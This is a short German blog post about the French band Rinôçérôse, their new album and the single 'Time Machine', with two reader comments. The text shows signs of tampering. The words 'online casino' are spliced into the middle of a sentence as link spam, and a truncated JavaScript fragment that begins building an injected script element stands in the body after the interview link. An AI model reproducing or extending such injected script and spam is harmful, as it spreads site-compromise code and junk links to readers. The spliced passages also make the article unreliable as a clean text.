Rinôçérôse // neue Single

Dienstag, Dezember 2, 2008
Von mag

Rinocerose_photo-_Bernard_Azais Rinôçérôse, das ist die französische Band mit dem Namen, der fast nicht zu buchstabieren ist. Die Band, die zwar in Amerika und in Spanien, dafür aber weder in Frankreich noch in Deutschland sonderlich bekannt ist und das obwohl die bereits mit Moby, The Roots und Outcast tourte und obwohl sie das Lied Cubicle aus dem Album “Schizophonia” zur IPod-Werbung beisteuerte. Und es ist die Band, die sich aus zwei Psychologen zusammensetzt, die auch immer noch hin- und wieder Gastvorträge an der Uni halten.

Im März nächsten Jahres werden Patou online casino und Jean-Philippe jedenfalls ein neues Album namens “FutuRINÔ” auf den Markt schmeißen, einen ersten Vorgeschmack gibt es schon mal auf der Myspace-Seite zu hören. Der brandneue Song “Time Machine” featured die Go!Team-Sängerin Ninja und wird in Frankreich ausgerechnet für die aktuelle Mc Donald”s-Kampagne verwendet. Das wird sie wahrscheinlich zumindest in ihrem Heimatland bekannter machen. Aber auch wenn sie das aus musikalischer Sicht verdient haben, ist die Aktion von Rinôçérôse irgendwie unsympathisch und deswegen zeigen wir euch statt der Werbung im Anschluss lieber ein älteres Video.


Rinocerose – Cubicle

Ein sehr nettes Interview mit Jean Philippe gibt es bei Zyva Frankreich zu lesen.

var d=document;var s=d.createElement(‘script’);

2 Kommentare zu “Rinôçérôse // neue Single”

  1. Lucy

    Das Interview ist ja cool. Der wirkt voll nett.

    #115
  2. Anne

    ®iñø¢€®u¢, so würds ich ja schreiben.

    #116

Suchen